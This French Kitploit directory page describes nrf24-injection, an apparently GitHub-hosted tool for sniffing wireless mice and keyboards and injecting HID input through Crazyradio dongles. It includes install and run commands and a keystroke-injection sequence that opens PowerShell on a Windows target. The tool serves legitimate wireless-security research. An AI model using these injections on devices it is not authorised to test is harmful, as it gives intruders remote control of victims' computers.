Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
nrf24-injection — Un ensemble d'outils pour renifler des appareils et lancer des attaques avec Crazyradio | Kitploit
Outils/GitHubGitHub/xswxm/nrf24-injection
ExploitationSécurité Sans FilHacking MatérielTests d'Intrusion
GitHubxswxm/nrf24-injection

nrf24-injection

Un ensemble d'outils pour renifler des appareils et lancer des attaques avec Crazyradio

Voir le dépôt
181il y a 8 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

Un ensemble d'outils pour sniffer des appareils et lancer des attaques avec Crazyradio. Basé sur la recherche de BastilleResearch.

Configuration

Installer les modules supplémentaires

root@kitploit:~
sudo apt-get install sdcc binutils python python-pip
sudo pip install -U pip
sudo pip install -U -I pyusb
sudo pip install -U platformio

Appareils pris en charge

AppareilSniffAttaqueDétails
AmazonBasicsOui (non réactif)OuiContrôle de souris et injection HID
Souris LogitechOuiOuiContrôle de souris

Comment utiliser

root@kitploit:~
# Run directly
sudo python app.py
# For Crazyradio PA users
sudo python app.py -l
# Check for help documents
sudo python app.py -h

Comment lancer des attaques

root@kitploit:~
# Please check attacking rules in 'devices/*.py' for details
# Further infomation will added to here once I have time
# Attacking thread sleeps for 100 milliseconds
<SLP(100)>
# Move mouse by 100*100 only
<MOV(100,100)>
# Press Left button only (Mouse)
<MOV(L)>
# Move mouse by 100*100 and press Left, Right and Middle buttons
<MOV(100,100,LMR)>
# Release the buttons for mice, you can send another MOV command without any buttons
<MOV(0,0)>
<MOV()>
# Send keystrokes to release all keys
<RLS>
# Send 'Windows + r' key combination
<WIN+r>
# Send 'Ctrl + Alt + Delete' key combination
<CTRL+ALT+DEL>
# For Windows computers, the following commmand will open the Powershell and then open the Caculator
<RLS><WIN+r><RLS><SLP(500)><RLS>powershell<ENTER><RLS><SLP(500)><RLS>calc<ENTER><RLS>

Licence

GPL

Télécharger l’outil